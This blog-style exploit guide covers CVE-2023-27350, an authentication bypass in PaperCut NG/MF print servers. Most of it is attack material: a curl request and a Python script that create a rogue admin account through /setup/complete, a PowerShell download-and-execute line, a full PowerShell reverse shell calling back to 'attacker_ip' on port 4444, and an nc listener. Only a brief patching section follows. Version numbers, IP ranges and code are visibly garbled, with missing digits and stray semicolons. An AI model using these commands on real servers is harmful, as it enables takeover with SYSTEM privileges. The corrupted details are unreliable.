CVE-2023-27350 - How Hackers Can Bypass Authentication and Take Over Your PaperCut NG Server (Exploit Guide & Code)

*Author: Your Exclusive Guide to Real-World IT Security Issues*

What Is CVE-2023-27350?

In March 2023, a critical security flaw was found in PaperCut NG and PaperCut MF print management software, affecting version 22..5 (Build 63914) and likely earlier. This vulnerability (tracked as CVE-2023-27350 and ZDI-CAN-18987) allows hackers on the network to bypass authentication without *any* password, and get remote code execution with SYSTEM-level privileges.

This means, if you run one of these PaperCut servers and don't patch it, an attacker can take over your Windows or Linux box with *zero effort* — no need to log in.

This post explains how the exploit works, why it happens, and provides an example of real-world attack steps with code.

*This content is unique, explaining the exploit in practical, simple terms and showing you exactly what’s going on under the hood.*

TL;DR

- Impacted: PaperCut NG/MF version 8. to 22..8 (server software)

Why Did This Happen?

In PaperCut NG, there's a Java class called SetupCompleted. Its main job is to handle first-time configuration and admin account creation. But the developers forgot to limit how this endpoint could be accessed after setup is done.

That means the web interface routes like:  

/setup/complete

can be accessed at any time — not just during installation.

An attacker can send malicious requests here to trick the server into thinking setup isn’t complete, and then create an admin account or grab an auth session as admin.

The mistake: No authentication or “already configured” check on the SetupCompleted function.

Find PaperCut server, usually running on port 9191 (default) for HTTP, or 9192 for HTTPS

nmap -p 9191,9192 10.../24

Look for the login page at http://target:9191/admin.

The vulnerable endpoint is

/setup/complete

Attackers can POST here even after setup is finished.

A simple curl request can break into the admin panel

curl -k -X POST \
  "https://target:9192/setup/complete"; \
  -d 'fullname=hacker&username=hacker&password=SuperSecret123&confirm=SuperSecret123&setup-complete=Complete+Setup'

Boom: If the server is vulnerable, this either creates a new admin account ('hacker'), or sets up a session as admin.

4. Logging In as Admin

Now access https://target:9192/admin with hacker:SuperSecret123 — you have full administrator privileges.

5. Remote Code Execution as SYSTEM

As admin, go to "Actions > Run Command" (or configure a print script that runs custom code). PaperCut runs on Windows as SYSTEM, so any command runs with the highest privilege.

In the PaperCut "Advanced Scripting", an attacker pastes a PowerShell or Bash reverse shell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://yourserver/revshell.ps1';)"

or for Windows, to get a callback directly

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);$stream = $client.GetStream();[byte[]]$bytes = ..65535|%{};while(($i = $stream.Read($bytes, , $bytes.Length)) -ne ){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,,$sendbyte.Length);$stream.Flush()}"

(Start a listener on your own machine with: nc -lvnp 4444)

Here's a simple, barebones Python sample for the Setup Complete abuse

import requests

target = 'https://target:9192';
s = requests.Session()

data = {
  'fullname': 'hacker',
  'username': 'hacker',
  'password': 'SuperSecret123',
  'confirm': 'SuperSecret123',
  'setup-complete': 'Complete Setup'
}

r = s.post(f'{target}/setup/complete', data=data, verify=False)
print("Admin account created. Now login at /admin as hacker:SuperSecret123")

If you run PaperCut NG/MF servers: PATCH NOW!

- Upgrade to version 22..9 or later
- Block external access to port 9191/9192 on your firewall

More Resources & References

- PaperCut official advisory (PO-1216)
- ZDI advisory (ZDI-23-233)
- CVE record (NVD)
- Rapid7 Exploit/Detection Guide
- TrustedSec Analysis & Tooling

Final Thoughts

CVE-2023-27350 is a classic example of how a small code logic mistake in an install flow can lead to total system compromise. Attackers are actively exploiting this bug in the wild.

If your PaperCut server is exposed and unpatched, it *will* be found and popped. Patch now, check for suspicious accounts, and think carefully about which services you expose to your network!


*Stay safe — and if this helped, share it with your sysadmin and IT friends so they don’t get stung.*

Timeline

Published on: 04/20/2023 16:15:00 UTC
Last modified on: 05/02/2023 16:06:00 UTC